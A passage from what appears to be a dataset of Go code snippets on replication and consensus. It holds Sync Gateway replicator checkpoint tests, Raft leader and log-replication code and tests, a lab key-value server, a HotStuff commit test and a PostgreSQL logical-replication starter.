ar.Push.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// checkpoint assertions\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n\n\t// Second batch of docs\n\tfor i := numRT1DocsInitial; i < numRT1DocsTotal; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"source\":\"rt1\",\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t}\n\n\t// Create a new replicator using the same config, which should use the checkpoint set from the first.\n\tarConfig.ReplicationStatsMap = base.SyncGatewayStats.NewDBStats(t.Name()+\"2\", false, false, false).DBReplicatorStats(t.Name())\n\tar = db.NewActiveReplicator(&arConfig)\n\tdefer func() { assert.NoError(t, ar.Stop()) }()\n\tassert.NoError(t, ar.Start())\n\n\t// wait for all of the documents originally written to rt1 to arrive at rt2\n\tchangesResults, err = rt2.WaitForChanges(numRT1DocsTotal, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, numRT1DocsTotal)\n\n\tdocIDsSeen = make(map[string]bool, numRT1DocsTotal)\n\tfor _, result := range changesResults.Results {\n\t\tdocIDsSeen[result.ID] = true\n\t}\n\n\tfor i := 0; i < numRT1DocsTotal; i++ {\n\t\tdocID := fmt.Sprintf(\"%s%d\", docIDPrefix, i)\n\t\tassert.True(t, docIDsSeen[docID])\n\n\t\tdoc, err := rt2.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\t\tassert.NoError(t, err)\n\n\t\tbody, err := doc.GetDeepMutableBody()\n\t\trequire.NoError(t, err)\n\t\tassert.Equal(t, \"rt1\", body[\"source\"])\n\t}\n\n\t// Make sure we've not started any more since:0 replications on rt1 since the first one\n\tendNumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, numChangesRequestedFromZeroTotal, endNumChangesRequestedFromZeroTotal)\n\n\t// make sure the new replicator has only sent new mutations\n\tnumRevsSentNewReplicator := ar.Push.GetStats().SendRevCount.Value()\n\tassert.Equal(t, numRT1DocsTotal-numRT1DocsInitial, int(numRevsSentNewReplicator))\n\tassert.Equal(t, int64(numRT1DocsTotal-numRT1DocsInitial), ar.Push.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(numRT1DocsTotal-numRT1DocsInitial), ar.Push.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// assert the second active replicator stats\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n\tar.Push.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n}", "func (s *RegionSyncer) StartSyncWithLeader(addr string) {\n\ts.wg.Add(1)\n\ts.RLock()\n\tclosed := s.closed\n\ts.RUnlock()\n\tgo func() {\n\t\tdefer s.wg.Done()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-closed:\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t}\n\t\t\t// establish client\n\t\t\tclient, err := s.establish(addr)\n\t\t\tif err != nil {\n\t\t\t\tif ev, ok := status.FromError(err); ok {\n\t\t\t\t\tif ev.Code() == codes.Canceled {\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tlog.Error(\"server failed to establish sync stream with leader\", zap.String(\"server\", s.server.Name()), zap.String(\"leader\", s.server.GetLeader().GetName()), zap.Error(err))\n\t\t\t\ttime.Sleep(time.Second)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tlog.Info(\"server starts to synchronize with leader\", zap.String(\"server\", s.server.Name()), zap.String(\"leader\", s.server.GetLeader().GetName()), zap.Uint64(\"request-index\", s.history.GetNextIndex()))\n\t\t\tfor {\n\t\t\t\tresp, err := client.Recv()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Error(\"region sync with leader meet error\", zap.Error(err))\n\t\t\t\t\tif err = client.CloseSend(); err != nil {\n\t\t\t\t\t\tlog.Error(\"failed to terminate client stream\", zap.Error(err))\n\t\t\t\t\t}\n\t\t\t\t\ttime.Sleep(time.Second)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tif s.history.GetNextIndex() != resp.GetStartIndex() {\n\t\t\t\t\tlog.Warn(\"server sync index not match the leader\",\n\t\t\t\t\t\tzap.String(\"server\", s.server.Name()),\n\t\t\t\t\t\tzap.Uint64(\"own\", s.history.GetNextIndex()),\n\t\t\t\t\t\tzap.Uint64(\"leader\", resp.GetStartIndex()),\n\t\t\t\t\t\tzap.Int(\"records-length\", len(resp.GetRegions())))\n\t\t\t\t\t// reset index\n\t\t\t\t\ts.history.ResetWithIndex(resp.GetStartIndex())\n\t\t\t\t}\n\t\t\t\tfor _, r := range resp.GetRegions() {\n\t\t\t\t\terr = s.server.GetStorage().SaveRegion(r)\n\t\t\t\t\tif err == nil {\n\t\t\t\t\t\ts.history.Record(core.NewRegionInfo(r, nil))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n}", "func TestActiveReplicatorPushFromCheckpointIgnored(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelInfo, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\tconst (\n\t\tchangesBatchSize = 10\n\t\tnumRT1DocsInitial = 13 // 2 batches of changes\n\t\tnumRT1DocsTotal = 24 // 2 more batches\n\t)\n\n\t// Active\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t})\n\tdefer rt1.Close()\n\n\t// Passive\n\ttb2 := base.GetTestBucket(t)\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb2,\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt2.Close()\n\n\t// Create first batch of docs\n\tdocIDPrefix := t.Name() + \"doc\"\n\tfor i := 0; i < numRT1DocsInitial; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt1RevID := respRevID(t, resp)\n\t\tresp = rt2.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt2RevID := respRevID(t, resp)\n\t\trequire.Equal(t, rt1RevID, rt2RevID)\n\t}\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build passiveDBURL with basic auth creds\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePush,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tChangesBatchSize: changesBatchSize,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\n\tstartNumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\n\tassert.NoError(t, ar.Start())\n\n\t_, ok := base.WaitForStat(func() int64 {\n\t\treturn ar.Push.Checkpointer.Stats().AlreadyKnownSequenceCount\n\t}, numRT1DocsInitial)\n\tassert.True(t, ok)\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tnumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, startNumChangesRequestedFromZeroTotal+1, numChangesRequestedFromZeroTotal)\n\n\t// rev assertions\n\tnumRevsSentTotal := ar.Push.GetStats().SendRevCount.Value()\n\tassert.Equal(t, int64(0), numRevsSentTotal)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// checkpoint assertions\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n\n\t// Second batch of docs\n\tfor i := numRT1DocsInitial; i < numRT1DocsTotal; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt1RevID := respRevID(t, resp)\n\t\tresp = rt2.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt2RevID := respRevID(t, resp)\n\t\trequire.Equal(t, rt1RevID, rt2RevID)\n\t}\n\n\t// Create a new replicator using the same config, which should use the checkpoint set from the first.\n\tar = db.NewActiveReplicator(&arConfig)\n\tdefer func() { assert.NoError(t, ar.Stop()) }()\n\tassert.NoError(t, ar.Start())\n\n\t_, ok = base.WaitForStat(func() int64 {\n\t\treturn ar.Push.Checkpointer.Stats().AlreadyKnownSequenceCount\n\t}, numRT1DocsTotal-numRT1DocsInitial)\n\tassert.True(t, ok)\n\n\t// Make sure we've not started any more since:0 replications on rt1 since the first one\n\tendNumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, numChangesRequestedFromZeroTotal, endNumChangesRequestedFromZeroTotal)\n\n\t// make sure rt1 thinks it has sent all of the revs via a 2.x replicator\n\tnumRevsSentTotal = ar.Push.GetStats().SendRevCount.Value()\n\tassert.Equal(t, int64(0), numRevsSentTotal)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// assert the second active replicator stats\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n\tar.Push.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n}", "func (s *raftServer) initLeader(followers []int) (*utils.SyncIntIntMap, *utils.SyncIntIntMap, *utils.SyncIntIntMap) {\n\tnextIndex := utils.CreateSyncIntMap()\n\tmatchIndex := utils.CreateSyncIntMap()\n\taeToken := utils.CreateSyncIntMap() // acts like mutex in producer-consumer\n\tnextLogEntry := s.localLog.TailIndex() + 1\n\tfor _, f := range followers {\n\t\tnextIndex.Set(f, nextLogEntry)\n\t\tmatchIndex.Set(f, 0)\n\t\taeToken.Set(f, 1)\n\t}\n\treturn nextIndex, matchIndex, aeToken\n}", "func TestReadOnlyForNewLeader(t *testing.T) {\n\tnodeConfigs := []struct {\n\t\tid uint64\n\t\tcommitted uint64\n\t\tapplied uint64\n\t\tcompact_index uint64\n\t}{\n\t\t{1, 1, 1, 0},\n\t\t{2, 2, 2, 2},\n\t\t{3, 2, 2, 2},\n\t}\n\tpeers := make([]stateMachine, 0)\n\tfor _, c := range nodeConfigs {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 1}})\n\t\tstorage.SetHardState(pb.HardState{Term: 1, Commit: c.committed})\n\t\tif c.compact_index != 0 {\n\t\t\tstorage.Compact(c.compact_index)\n\t\t}\n\t\tcfg := newTestConfig(c.id, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tcfg.Applied = c.applied\n\t\traft := newRaft(cfg)\n\t\tpeers = append(peers, raft)\n\t}\n\tnt := newNetwork(peers...)\n\n\t// Drop MsgApp to forbid peer a to commit any log entry at its term after it becomes leader.\n\tnt.ignore(pb.MsgApp)\n\t// Force peer a to become leader.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"state = %s, want %s\", sm.state, StateLeader)\n\t}\n\n\t// Ensure peer a drops read only request.\n\tvar windex uint64 = 4\n\twctx := []byte(\"ctx\")\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 0 {\n\t\tt.Fatalf(\"len(readStates) = %d, want zero\", len(sm.readStates))\n\t}\n\n\tnt.recover()\n\n\t// Force peer a to commit a log entry at its term\n\tfor i := 0; i < sm.heartbeatTimeout; i++ {\n\t\tsm.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\tif sm.raftLog.committed != 4 {\n\t\tt.Fatalf(\"committed = %d, want 4\", sm.raftLog.committed)\n\t}\n\tlastLogTerm := sm.raftLog.zeroTermOnErrCompacted(sm.raftLog.term(sm.raftLog.committed))\n\tif lastLogTerm != sm.Term {\n\t\tt.Fatalf(\"last log term = %d, want %d\", lastLogTerm, sm.Term)\n\t}\n\n\t// Ensure peer a accepts read only request after it commits a entry at its term.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 1 {\n\t\tt.Fatalf(\"len(readStates) = %d, want 1\", len(sm.readStates))\n\t}\n\trs := sm.readStates[0]\n\tif rs.Index != windex {\n\t\tt.Fatalf(\"readIndex = %d, want %d\", rs.Index, windex)\n\t}\n\tif !bytes.Equal(rs.RequestCtx, wctx) {\n\t\tt.Fatalf(\"requestCtx = %v, want %v\", rs.RequestCtx, wctx)\n\t}\n}", "func StartKVServer(servers []*labrpc.ClientEnd, me int, persister *raft.Persister, maxraftstate int) *KVServer {\n\t// call labgob.Register on structures you want\n\t// Go's RPC library to marshall/unmarshall.\n\tlabgob.Register(Op{})\n\n\tkv := new(KVServer)\n\tkv.me = me\n\n\tkv.maxraftstate = maxraftstate\n\n\t//kv.GetChan = make(chan bool)\n\t//kv.PAChan = make(chan bool)\n\tkv.notify = make(map[int]chan Op) //->chan array\n\t// You may need initialization code here.\n\n\tkv.applyCh = make(chan raft.ApplyMsg)\n\tkv.storage = make(map[string]string)\n\n\tif Conservative > 0 {\n\t\tkv.commFilter = make(map[int64][]int)\n\t} else {\n\t\tkv.commFilterX = make(map[int64]int)\n\t}\n\tkv.rf = raft.Make(servers, me, persister, kv.applyCh)\n\n\tgo func() {\n\n\t\tfor { //m := range kv.applyCh {\n\t\t\tm := <-kv.applyCh\n\t\t\tif m.UseSnapshot {\n\t\t\t\tvar LastIncludedIndex int\n\t\t\t\tvar LastIncludedTerm int\n\n\t\t\t\tr := bytes.NewBuffer(m.Snapshot)\n\t\t\t\td := gob.NewDecoder(r)\n\n\t\t\t\tkv.mu.Lock()\n\t\t\t\td.Decode(&LastIncludedIndex)\n\t\t\t\td.Decode(&LastIncludedTerm)\n\t\t\t\tkv.storage = make(map[string]string)\n\t\t\t\tkv.commFilterX = make(map[int64]int)\n\t\t\t\td.Decode(&kv.storage)\n\t\t\t\td.Decode(&kv.commFilterX)\n\t\t\t\tkv.mu.Unlock()\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif kv.rf.State == 1 {\n\t\t\t\tDPrintNew(\"I am the leader %d\", kv.me)\n\t\t\t}\n\t\t\t//do get / append / put\n\t\t\tDPrintf5(\"server %d received applych\", kv.me)\n\t\t\top := m.Command.(Op)\n\n\t\t\tkv.mu.Lock()\n\t\t\t//DPrintf5(\"%v will put %v %v with snum %d-----------------------------\", op.Cid, op.Key, op.Value, op.Snum)\n\t\t\tif Conservative > 0 {\n\t\t\t\tif op.Optype != \"Get\" && !kv.FilterSnum(op.Cid, op.Snum) {\n\n\t\t\t\t\tkv.ApplyOp(op)\n\n\t\t\t\t\tif kv.commFilter[op.Cid] == nil {\n\t\t\t\t\t\tkv.commFilter[op.Cid] = make([]int, 0)\n\t\t\t\t\t}\n\t\t\t\t\tkv.commFilter[op.Cid] = append(kv.commFilter[op.Cid], op.Snum)\n\n\t\t\t\t\t//kv.ApplyOp(op)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif op.Optype != \"Get\" {\n\t\t\t\t\tif snum, ok := kv.commFilterX[op.Cid]; !ok || op.Snum > snum {\n\t\t\t\t\t\tkv.ApplyOp(op)\n\t\t\t\t\t\tkv.commFilterX[op.Cid] = op.Snum\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tnotifyChan, ok := kv.notify[m.CommandIndex]\n\t\t\tif ok {\n\t\t\t\tnotifyChan <- op\n\t\t\t}\n\t\t\tDPrintNew(\"cmdidx: %d, logsize %d\", m.CommandIndex, kv.rf.GetPersistSize())\n\t\t\tif kv.maxraftstate != -1 && kv.rf.GetPersistSize() > kv.maxraftstate {\n\t\t\t\t//only for non-conservative\n\n\t\t\t\tDPrintNew(\"KV side: me: %d, cmdidx: %d, logsize %d\", kv.me, m.CommandIndex, kv.rf.GetPersistSize())\n\t\t\t\tw := new(bytes.Buffer)\n\t\t\t\te := labgob.NewEncoder(w)\n\t\t\t\te.Encode(kv.storage)\n\t\t\t\te.Encode(kv.commFilterX)\n\t\t\t\tdata := w.Bytes()\n\n\t\t\t\tgo kv.rf.DoSnapshot(data, m.CommandIndex) //may use another index\n\n\t\t\t}\n\n\t\t\tkv.mu.Unlock()\n\t\t}\n\t}()\n\n\t// You may need initialization code here.\n\n\treturn kv\n}", "func Test_consensusIterations(t *testing.T) {\n\ttest := newConsensusTest()\n\n\ttotalNodes := 15\n\tcfg := config.Config{N: totalNodes, F: totalNodes/2 - 1, RoundDuration: 1, ExpectedLeaders: 5, LimitIterations: 1000, LimitConcurrent: 100}\n\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\tmesh, err := mocknet.FullMeshLinked(ctx, totalNodes)\n\trequire.NoError(t, err)\n\n\ttest.initialSets = make([]*Set, totalNodes)\n\tset1 := NewSetFromValues(value1)\n\ttest.fill(set1, 0, totalNodes-1)\n\ttest.honestSets = []*Set{set1}\n\toracle := eligibility.New(logtest.New(t))\n\ti := 0\n\tcreationFunc := func() {\n\t\thost := mesh.Hosts()[i]\n\t\tps, err := pubsub.New(ctx, logtest.New(t), host, pubsub.DefaultConfig())\n\t\trequire.NoError(t, err)\n\t\tp2pm := &p2pManipulator{nd: ps, stalledLayer: types.NewLayerID(1), err: errors.New(\"fake err\")}\n\t\tproc, broker := createConsensusProcess(t, true, cfg, oracle, p2pm, test.initialSets[i], types.NewLayerID(1), t.Name())\n\t\ttest.procs = append(test.procs, proc)\n\t\ttest.brokers = append(test.brokers, broker)\n\t\ti++\n\t}\n\ttest.Create(totalNodes, creationFunc)\n\trequire.NoError(t, mesh.ConnectAllButSelf())\n\ttest.Start()\n\ttest.WaitForTimedTermination(t, 40*time.Second)\n}", "func StartReplication(ctx context.Context, conn *pgconn.PgConn, slotName string, startLSN LSN, options StartReplicationOptions) error {\n\tvar timelineString string\n\tvar pluginArgumentsString string\n\tif options.Timeline > 0 {\n\t\ttimelineString = fmt.Sprintf(\"TIMELINE %d\", options.Timeline)\n\t}\n\tif len(options.PluginArguments) > 0 {\n\t\tpluginArgumentsString = fmt.Sprintf(\"( %s )\", strings.Join(options.PluginArguments, \", \"))\n\t}\n\tsql := fmt.Sprintf(\"START_REPLICATION SLOT \\\"%s\\\" LOGICAL %s %s %s\", slotName, startLSN, timelineString, pluginArgumentsString)\n\n\tbuf := (&pgproto3.Query{String: sql}).Encode(nil)\n\terr := conn.SendBytes(ctx, buf)\n\tif err != nil {\n\t\treturn errors.Errorf(\"failed to send START_REPLICATION: %w\", err)\n\t}\n\n\tfor {\n\t\tmsg, err := conn.ReceiveMessage(ctx)\n\t\tif err != nil {\n\t\t\treturn errors.Errorf(\"failed to receive message: %w\", err)\n\t\t}\n\n\t\tswitch msg := msg.(type) {\n\t\tcase *pgproto3.NoticeResponse:\n\t\tcase *pgproto3.ErrorResponse:\n\t\t\treturn pgconn.ErrorResponseToPgError(msg)\n\t\tcase *pgproto3.CopyBothResponse:\n\t\t\t// This signals the start of the replication stream.\n\t\t\treturn nil\n\t\tdefault:\n\t\t\treturn errors.Errorf(\"unexpected response: %t\", msg)\n\t\t}\n\t}\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n rf.mu.Lock()\n defer rf.mu.Unlock()\n\n if rf.state != StateLeader {\n return nilIndex, nilIndex, false\n }\n\n // Your code here (2B).\n\n logLen := len(rf.log)\n index := logLen\n term := rf.currentTerm\n isLeader := true\n\n thisEntry := LogEntry{rf.currentTerm, command}\n rf.log = append(rf.log, thisEntry)\n rf.matchIndex[rf.me] = len(rf.log)\n\n rf.persist()\n\n // rf.print(\"Client start command %v\", command)\n\n return index, term, isLeader\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], []byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func TestCommit(t *testing.T) {\n\tconst n = 4\n\tctrl := gomock.NewController(t)\n\ths := New()\n\tkeys := testutil.GenerateKeys(t, n, testutil.GenerateECDSAKey)\n\tbl := testutil.CreateBuilders(t, ctrl, n, keys...)\n\tacceptor := mocks.NewMockAcceptor(ctrl)\n\texecutor := mocks.NewMockExecutor(ctrl)\n\tsynchronizer := synchronizer.New(testutil.FixedTimeout(1000))\n\tcfg, replicas := testutil.CreateMockConfigWithReplicas(t, ctrl, n, keys...)\n\tbl[0].Register(hs, cfg, acceptor, executor, synchronizer, leaderrotation.NewFixed(2))\n\thl := bl.Build()\n\tsigners := hl.Signers()\n\n\t// create the needed blocks and QCs\n\tgenesisQC := hotstuff.NewQuorumCert(nil, 0, hotstuff.GetGenesis().Hash())\n\tb1 := testutil.NewProposeMsg(hotstuff.GetGenesis().Hash(), genesisQC, \"1\", 1, 2)\n\tb1QC := testutil.CreateQC(t, b1.Block, signers)\n\tb2 := testutil.NewProposeMsg(b1.Block.Hash(), b1QC, \"2\", 2, 2)\n\tb2QC := testutil.CreateQC(t, b2.Block, signers)\n\tb3 := testutil.NewProposeMsg(b2.Block.Hash(), b2QC, \"3\", 3, 2)\n\tb3QC := testutil.CreateQC(t, b3.Block, signers)\n\tb4 := testutil.NewProposeMsg(b3.Block.Hash(), b3QC, \"4\", 4, 2)\n\n\t// the second replica will be the leader, so we expect it to receive votes\n\treplicas[1].EXPECT().Vote(gomock.Any()).AnyTimes()\n\treplicas[1].EXPECT().NewView(gomock.Any()).AnyTimes()\n\n\t// executor will check that the correct command is executed\n\texecutor.EXPECT().Exec(gomock.Any()).Do(func(arg interface{}) {\n\t\tif arg.(hotstuff.Command) != b1.Block.Command() {\n\t\t\tt.Errorf(\"Wrong command executed: got: %s, want: %s\", arg, b1.Block.Command())\n\t\t}\n\t})\n\n\t// acceptor expects to receive the commands in order\n\tgomock.InOrder(\n\t\tacceptor.EXPECT().Proposed(gomock.Any()),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"1\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"1\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"2\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"2\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"3\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"3\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"4\")).Return(true),\n\t)\n\n\ths.OnPropose(b1)\n\ths.OnPropose(b2)\n\ths.OnPropose(b3)\n\ths.OnPropose(b4)\n}", "func (r *Raft) setupAppendEntries(s *followerReplication, req *pb.AppendEntriesRequest, nextIndex, lastIndex uint64) error {\n\treq.Term = s.currentTerm\n\treq.Leader = r.transport.EncodePeer(r.localID, r.localAddr)\n\treq.LeaderCommitIndex = r.getCommitIndex()\n\tif err := r.setPreviousLog(req, nextIndex); err != nil {\n\t\treturn err\n\t}\n\tif err := r.setNewLogs(req, nextIndex, lastIndex); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func TestReplicationSeqNotMatch(t *testing.T) {\n\tctl := gomock.NewController(t)\n\tdefer ctl.Finish()\n\n\tmockServiceClient := 